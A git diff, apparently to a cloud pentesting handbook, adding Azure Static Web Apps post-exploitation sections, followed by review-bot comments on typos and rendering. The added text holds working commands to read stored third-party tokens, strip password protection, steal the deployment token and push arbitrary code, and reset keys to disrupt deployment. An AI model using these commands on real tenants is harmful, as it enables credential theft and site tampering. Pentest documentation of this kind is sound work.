diff --git a/src/images/azure_static_password.png b/src/images/azure_static_password.png new file mode 100644 index 0000000000..9b11425160 Binary files /dev/null and b/src/images/azure_static_password.png differ diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md index b5cb2fbde1..29bbc001de 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md @@ -105,7 +105,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole` An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\ -_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._ +_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._ ## References diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md index 026c9f96b0..66591865d8 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md 
@@ -33,6 +33,48 @@ az rest \ }' ``` +### Read Configured Third Party Credentials + +As explained in the App Service section: + +{{#ref}} +../az-privilege-escalation/az-app-services-privesc.md +{{#endref}} + +Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one. + +```bash +az rest --method GET \ + --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" +``` + +This command returns tokens for Github, Bitbucket, Dropbox and OneDrive. + +Here you have some command examples to check the tokens: + +```bash +# GitHub – List Repositories +curl -H "Authorization: token " \ + -H "Accept: application/vnd.github.v3+json" \ + https://api.github.com/user/repos + +# Bitbucket – List Repositories +curl -H "Authorization: Bearer " \ + -H "Accept: application/json" \ + https://api.bitbucket.org/2.0/repositories + +# Dropbox – List Files in Root Folder +curl -X POST https://api.dropboxapi.com/2/files/list_folder \ + -H "Authorization: Bearer " \ + -H "Content-Type: application/json" \ + --data '{"path": ""}' + +# OneDrive – List Files in Root Folder +curl -H "Authorization: Bearer " \ + -H "Accept: application/json" \ + https://graph.microsoft.com/v1.0/me/drive/root/children +``` + ### Overwrite file - Overwrite routes, HTML, JS... It's possible to **overwritte a fie inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message. 
@@ -64,6 +106,77 @@ curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \ ``` +### Microsoft.Web/staticSites/config/write + +With this permission, it's possible to **modify the password** protecting a static web app or even unprotect every environment by sending a request such as the following: + +```bash +# Change password +az rest --method put \ +--url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ +--headers 'Content-Type=application/json' \ +--body '{ + "name": "basicAuth", + "type": "Microsoft.Web/staticSites/basicAuth", + "properties": { + "password": "SuperPassword123.", + "secretUrl": "", + "applicableEnvironmentsMode": "AllEnvironments" + } +}' + +# Remove the need of a password +az rest --method put \ +--url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ +--headers 'Content-Type=application/json' \ +--body '{ + "name": "basicAuth", + "type": "Microsoft.Web/staticSites/basicAuth", + "properties": { + "secretUrl": "", + "applicableEnvironmentsMode": "SpecifiedEnvironments", + "secretState": "None" + } +}' +``` + +### Microsoft.Web/staticSites/listSecrets/action + +This permission allows to get the **API key deployment token** for the static app. + +This token allows to deploy the app + +```bash +az rest --method POST \ +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//listSecrets?api-version=2023-01-01" +``` + +Then, in order to update an app you could run the following command. Note that this command was extracted checking **how to Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) works**, as it's the one Azure set by default ot use. So the image and paarements could change in the future. + +1. 
Download the repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (or any other repo you want to deploy) and run `cd react-basic`. +2. Change the code you want to deploy +3. Deploy it running (Remember to change the ``): + +```bash +docker run -it --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN= INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose +``` + +### Microsoft.Web/staticSites/write + +With this permission it's possible to **change the source of the static web app to a different Github repository**, however, it won't be automatically provisioned as this must be done from a Github Action usually with the token that authorized the action as this token is not automatically updated inside the Githb secrets of the repo (it's just added automatically when the app is created). + +```bash +az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main +``` + +### Microsoft.Web/staticSites/resetapikey/action + +With this permision it's possible to **reset the API key of the static web app** potentially DoSing the workflows that automatically deploy the app. + +```bash +az rest --method POST \ + --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//resetapikey?api-version=2019-08-01" +``` {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md index b1a1ff429d..1ded8ded5f 100644 
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -44,7 +44,7 @@ You can change the user agent **manually** in the developer tools:
- Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). +Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). ### Locations: Countries, IP ranges - Device Condition diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md index c31e441aba..2c626cbc1c 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md @@ -5,8 +5,63 @@ ## Static Web Apps Basic Information +Azure Static Web Apps is a cloud service for hosting **static web apps with automatic CI/CD from repositories like GitHub**. It offers global content delivery, serverless backends, and built-in HTTPS, making it secure and scalable. However, risks include misconfigured CORS, insufficient authentication, and content tampering, which can expose apps to attacks like XSS and data leakage if not properly managed. -- **Routes**: It's possible to change the routes of a static webapp by modifying the `staticwebapp.config.json` file. This file is located in the root of the repository and **contains the routes that the app will use**. +> [!TIP] +> When a Static App is created you can choose the **deployment authorization policy** between **Deployment token** and **GitHub Actions workflow**. + + +### Web App Authentication + +It's possible to **configure a password** to access the Web App. The web console allows to configure it to protect only staging environments or both staging and the production one. + +This is how at the time of writing a password protected web app looks like: + +
+ + +It's possible to see **if any password is being used** and which environments are protected with: + +```bash +az rest --method GET \ +--url "/subscriptions//resourceGroups/Resource_Group_1/providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2024-04-01" +``` + +However, this **won't show the password in clear text**, just something like: `"password": "**********************"`. + +### Routes + +Routes define **how incoming HTTP requests are handled** within a static web app. Configured in the **`staticwebapp.config.json`** file, they control URL rewriting, redirections, access restrictions, and role-based authorization, ensuring proper resource handling and security. + +Some example: + +```json +{ + "routes": [ + { + "route": "/", + "rewrite": "/index.html" + }, + { + "route": "/about", + "rewrite": "/about.html" + }, + { + "route": "/api/*", + "allowedRoles": ["authenticated"] + }, + { + "route": "/admin", + "redirect": "/login", + "statusCode": 302 + } + ], + "navigationFallback": { + "rewrite": "/index.html", + "exclude": ["/api/*", "/assets/*"] + } +} +``` ## Enumeration @@ -41,6 +96,11 @@ az rest --method POST \ ## Examples to generate Web Apps +You cna find a nice example to generate a web app in the following link: [https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github](https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github) + +1. Fork the repository https://github.com/staticwebdev/react-basic/generate to your GitHub account and name it `my-first-static-web-app` +2. In the Azure portal create a Static Web App configuring the Github access and selecting th previously forked new repository +3. Create it, and wait some minutes, and check your new page! ## Post Exploitation 
diff --git a/src/pentesting-cloud/azure-security/az-services/image.png b/src/pentesting-cloud/azure-security/az-services/image.png new file mode 100644 index 0000000000..fc9c66aa01 Binary files /dev/null and b/src/pentesting-cloud/azure-security/az-services/image.png differ
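Review bot: In the aws-sagemaker-privesc.md hunk the removed and added lines read identically ("_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._"), so this appears to be a whitespace-only or invisible-character change; if that is not intentional, drop the hunk from the PR, and if it is intentional, say so in the commit message so the reviewer does not have to diff byte-by-byte. While touching the line, "I haven't exploited because of the lack of time" reads better as "I haven't exploited it for lack of time".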
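Review bot: In the first az-static-web-apps-post-exploitation.md hunk ("Read Configured Third Party Credentials") the four curl examples carry an empty credential value (`-H "Authorization: token "`, `-H "Authorization: Bearer "`), so as rendered the commands are malformed; if an angle-bracket placeholder was intended it has not survived, so use a form that renders reliably in the fenced block, for example `Authorization: token $GITHUB_TOKEN`, and state where the value comes from (the `sourcecontrols` response above). The sentence "if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one" is hard to parse; suggest "tokens are stored per user, so credentials configured by another account are not returned for the current one". The context line "overwritte a fie inside the Github repo" is pre-existing but this is a good moment to fix it to "overwrite a file inside the GitHub repo".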
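Review bot: In the second az-static-web-apps-post-exploitation.md hunk the "Remove the need of a password" body sets `"applicableEnvironmentsMode": "SpecifiedEnvironments"` while the prose says it will "unprotect every environment"; either the mode value or the sentence should be adjusted so the example and its description agree, and a one-line explanation of what `secretState: "None"` does would help the reader. The `api-version` values are inconsistent across this file (`2021-03-01` for basicAuth, `2023-01-01` for listSecrets, `2019-08-01` for resetapikey) and differ from the `2024-04-01` used for the same basicAuth endpoint in az-static-web-apps.md; pick one version that supports all calls and use it throughout. The `az rest` URLs have empty segments (`/subscriptions//resourceGroups//providers/.../staticSites//config/basicAuth`), so the placeholders did not render; same for the `INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=` value and "Remember to change the ``" in the docker step. In the docker command, quote the mount path as `-v "$(pwd)":/mnt` so paths with spaces work. Typos: "ot use" → "to use", "paarements" → "parameters", "Githb" → "GitHub", "permision" → "permission"; "This token allows to deploy the app" needs a full stop and should read "allows deploying the app". Finally, there is no blank line between the closing fence of the resetapikey block and the `{{#include ...}}` line; add one so the include is not glued to the code block.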
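Review bot: In the az-conditional-access-policies-mfa-bypass.md hunk, dropping the leading `- ` turns "Or use a browser extension like this one" into a standalone paragraph, but the preceding context line "You can change the user agent **manually** in the developer tools:" ends with a colon that introduces what follows; if the other alternatives in that section are still bullet items, this line should stay a bullet for parallel structure, and if none of them are, the colon should become a full stop. Please confirm which is intended.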
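Review bot: In the first az-static-web-apps.md hunk the removed `**Routes**` bullet stated that `staticwebapp.config.json` "is located in the root of the repository", and the new "### Routes" section no longer says where the file lives; keep that sentence, since knowing the file's location is what lets a reviewer check whether route restrictions and `allowedRoles` are actually in effect. The line "This is how at the time of writing a password protected web app looks like:" is followed by nothing visible, so the image reference appears to be missing, while the PR adds two binaries (`src/images/azure_static_password.png` and `src/pentesting-cloud/azure-security/az-services/image.png`); add the image tag and remove whichever file is unused. The basicAuth `az rest` URL hardcodes `Resource_Group_1` next to empty subscription and site segments; use placeholders consistently. Grammar: "The web console allows to configure it" → "allows configuring it", and "how ... a password protected web app looks like" → "what ... a password-protected web app looks like".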
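Review bot: In the second az-static-web-apps.md hunk ("Examples to generate Web Apps") step 1 says "Fork the repository https://github.com/staticwebdev/react-basic/generate", but the `/generate` path is GitHub's create-from-template flow rather than a fork, and the linked Microsoft guide uses the template; reword to "Create a new repository from the template at ..." so the instruction matches the URL. Typos: "You cna find" → "You can find", "selecting th previously forked" → "selecting the previously created".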